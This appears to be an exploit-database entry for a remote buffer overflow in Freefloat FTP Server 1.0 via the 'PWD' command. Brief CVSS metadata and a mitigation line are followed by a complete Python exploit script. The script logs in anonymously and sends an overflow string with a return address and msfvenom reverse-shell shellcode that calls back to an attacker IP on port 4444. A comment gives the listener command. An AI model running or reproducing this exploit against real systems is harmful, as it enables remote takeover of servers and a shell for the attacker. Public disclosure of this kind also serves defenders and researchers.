Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow

vendor:

Freefloat FTP Server

by:

Waqas Ahmed Farooqi

7.5

CVSS

HIGH

Remote Buffer Overflow

119

CWE

Product Name: Freefloat FTP Server

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:freefloat:freefloat_ftp_server:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

2023

Freefloat FTP Server 1.0 – ‘PWD’ Remote Buffer Overflow

The exploit allows an attacker to execute arbitrary code by sending a specially crafted 'PWD' command to the Freefloat FTP Server 1.0. It triggers a buffer overflow in the server, leading to remote code execution.

Mitigation:

The vendor has not released a patch or mitigation for this vulnerability. It is recommended to discontinue the use of Freefloat FTP Server 1.0 and switch to a more secure FTP server software.

Source

Exploit-DB raw data:

#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
#Date: 08/22/2023
#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
#Vendor Homepage: http://www.freefoat.com
#Version: 1.0
#Tested on Windows XP SP3 


#!/usr/bin/python

import socket

#Metasploit Shellcode
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' 

#nc -lvp 4444
#Send exploit


#offset = 247 
#badchars=\x00\x0d\
#return_address=\x3b\x69\x5a\x77 (ole32.dll)

payload = (
"\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"
"\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"
"\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"
"\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"
"\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"
"\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"
"\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"
"\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"
"\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"
"\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"
"\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"
"\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"
"\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"
"\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"
"\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"
"\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"
"\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"
"\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"
"\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"
"\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"
"\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"
"\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"
"\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"
"\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"
"\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"
"\x19")

shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payload

def main():
    ip = '192.168.146.135'
    port = 21

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, port))
    
    sock.recv(1024)
    sock.send('USER anonymous\r\n')
    sock.recv(1024)
    sock.send('PASS anonymous\r\n')
    sock.recv(1024)
    sock.send('pwd ' + shellcode + '\r\n')
    sock.close()
    
if __name__ == '__main__':
    main()